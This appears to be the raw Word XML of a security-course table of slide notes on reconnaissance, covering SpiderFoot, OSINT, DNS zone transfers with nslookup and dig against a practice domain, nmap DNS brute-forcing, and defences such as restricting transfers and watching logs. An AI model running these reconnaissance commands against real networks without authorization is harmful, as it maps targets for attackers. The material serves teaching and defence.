          <w:p w14:paraId="67B2D964" w14:textId="547D7C8D" w:rsidR="0013351D" w:rsidRDefault="0013351D" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00546E78" w:rsidRPr="006F5A04" w14:paraId="192C91D6" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ABAE354" w14:textId="43D26536" w:rsidR="00546E78" w:rsidRDefault="00546E78" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SpiderFoot tip 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EAFD333" w14:textId="35907827" w:rsidR="00546E78" w:rsidRDefault="00762139" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">View the </w:t>
            </w:r>
            <w:r w:rsidR="007C7FA8">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SpiderFoot scan results as a chart, a graph, or a list view (shown here). Each module can be selected to look at the individuals results such as domain information, externally hosted resources, third-party affiliate relationships, file metadata, and more.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A462286" w14:textId="025E30AF" w:rsidR="00546E78" w:rsidRDefault="007C7FA8" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FA71DBD" w14:textId="77065366" w:rsidR="00546E78" w:rsidRDefault="007C7FA8" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE2116" w:rsidRPr="006F5A04" w14:paraId="6D209668" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42986022" w14:textId="3100EA68" w:rsidR="00FE2116" w:rsidRDefault="00FE2116" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Not OSINT Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B725BF8" w14:textId="77777777" w:rsidR="00FE2116" w:rsidRDefault="00FE2116" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Generally, OSINT </w:t>
            </w:r>
            <w:r w:rsidR="006D5CB8">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>data is collected from websites and APIs, through third-party collection sources.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="795C1478" w14:textId="77777777" w:rsidR="006D5CB8" w:rsidRDefault="006D5CB8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Great for attackers since it does not generate logs at the target site.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16F2948F" w14:textId="38C09347" w:rsidR="006D5CB8" w:rsidRDefault="006D5CB8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>While abundant, OSINT is not the end of all available target data.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AACC35A" w14:textId="24D01D36" w:rsidR="006D5CB8" w:rsidRDefault="006D5CB8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Although some OSING tools cross this line, any activity sent to the target site directly becomes direct reconnaissance. Next, we’ll look at tools that provide additional information at the cost of potential target identification.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00CF4D15" w14:textId="28A74F0D" w:rsidR="00FE2116" w:rsidRDefault="006D5CB8" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BCCDBFF" w14:textId="007B0B85" w:rsidR="00FE2116" w:rsidRDefault="006D5CB8" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>27</w:t>
            </w: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7BB104FD" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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51A9340A" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00B7716E" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>28</w:t>
            </w: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0FFDED6"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nslookup  server 81.4.108.41  settype=AXFR  ls -d zonetransfer.me  tcp/port 53</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76799E5D" w14:textId="6BB97DE7" w:rsidR="00B7716E" w:rsidRPr="00B7716E" w:rsidRDefault="00B7716E" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>dig @81.4.108.41 AXFR zonetransfer.me</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67BA6641" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00B7716E" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>29</w:t>
            </w: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577402CD"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 xml:space="preserve">2 tools used to perform DNS interrogation: </w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">nslookup </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> dig</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D13B126"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domain name system is full of useful information about a target.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52113262" w14:textId="174FB167" w:rsidR="00B7716E" w:rsidRDefault="00B7716E" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>The attacker’s goal is to discover as many IP address associated with the target domain as possible.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42F0F075"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nslookup command can be used to interact with a DNS server to get this data.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29CAEA5F"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Included in modern versions of windows.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C2D18F6" w14:textId="77777777" w:rsidR="004453DD" w:rsidRDefault="00B7716E" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Included in most </w:t>
            </w:r>
            <w:r w:rsidR="00552700">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>UNIX implementations (deprecated in some UNIXes and limited</w:t>
            </w:r>
            <w:r w:rsidR="004453DD">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> on some Linux variants) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E044BB1" w14:textId="4A2C9C3E" w:rsidR="00B7716E" w:rsidRPr="006F5A04" w:rsidRDefault="004453DD" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Dig is another useful tool for DNS recon.</w:t>
            </w:r>
            <w:r w:rsidR="00B7716E">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  </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259A4FA3" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00B7716E" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>31</w:t>
            </w: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02059395" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="004453DD" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>WHOIS finds the authoritative for the domain.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F5B19E1" w14:textId="5DC985B1" w:rsidR="00EB51CC" w:rsidRDefault="00EB51CC" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>By dumping from your DNS servers, attackers can determine which systems are accessible on the internet.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2170B443" w14:textId="171AAD65" w:rsidR="004453DD" w:rsidRPr="006F5A04" w:rsidRDefault="00EB51CC" w:rsidP="00EB51CC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>On Windows, collect DNS records using nslookup</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434B9685" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00EB51CC" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>32</w:t>
            </w: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DNS Zone Transfer in UNIX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1815CAFA"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on some UNIX variations, nslookup can be used for zone transfers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4397A3FC"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Using the same technique used for windows on previous slide.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C18ABD"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Other nslookup variations (including the one for recent versions of Linux) do not support zone transfer.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EB0CA60" w14:textId="209C2230" w:rsidR="007F7C68" w:rsidRPr="007F7C68" w:rsidRDefault="007F7C68" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Use </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>dig</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> instead.</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02AC879C" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00EB51CC" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>33</w:t>
            </w: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71246906" w14:textId="11F73144" w:rsidR="007F7C68" w:rsidRDefault="007F7C68" w:rsidP="007F7C68">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sudo nmap --script dns-brute</w:t>
            </w:r>
            <w:r w:rsidR="00B168E9">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="013FC63B" w14:textId="5278E464" w:rsidR="00B168E9" w:rsidRDefault="00B168E9" w:rsidP="007F7C68">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Many DNS servers will not permit the use of DNS zone transfers. However, DNS Automated interrogation can be still useful mechanism for host discovery.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A426A6D" w14:textId="626DD37D" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00B168E9" w:rsidP="00B168E9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>To be effective, Nmap needs a list of hostnames (identified here as namelist.txt). if not specified, Nmap will build a list of 70 hostnames.</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5975AE3B" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00810748" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>34</w:t>
            </w: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1A290044" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00D37EC4" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Do not allow zone transfers from just any system</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="727F9CE7" w14:textId="40384A4C" w:rsidR="00D37EC4" w:rsidRPr="00D37EC4" w:rsidRDefault="00D37EC4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="60"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D37EC4">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Limit zone transfers accessibly to DNS servers only.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1282CDB9" w14:textId="77777777" w:rsidR="00D37EC4" w:rsidRPr="00D37EC4" w:rsidRDefault="00D37EC4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="60"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D37EC4">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Secondary and tertiary servers should not accept zone transfers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04D57013" w14:textId="77777777" w:rsidR="00D37EC4" w:rsidRDefault="00D37EC4" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use split DNS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BE8B8F0" w14:textId="77777777" w:rsidR="00D37EC4" w:rsidRPr="00D37EC4" w:rsidRDefault="00D37EC4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="61"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D37EC4">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>External name information in external server, internal name information in internal servers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="392C2DF1" w14:textId="77777777" w:rsidR="00D37EC4" w:rsidRDefault="00D37EC4" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Inspect DNS server logs for signs of attack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D4EA51" w14:textId="77B88947"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Look for zone transfers, failed and successful.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="000DFA0C" w14:textId="77777777"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Look for large numbers of requests from a single source (DNS brute)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F709460" w14:textId="16FF3A08"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Use attacking IP address to inform threat intelligence efforts.</w:t>
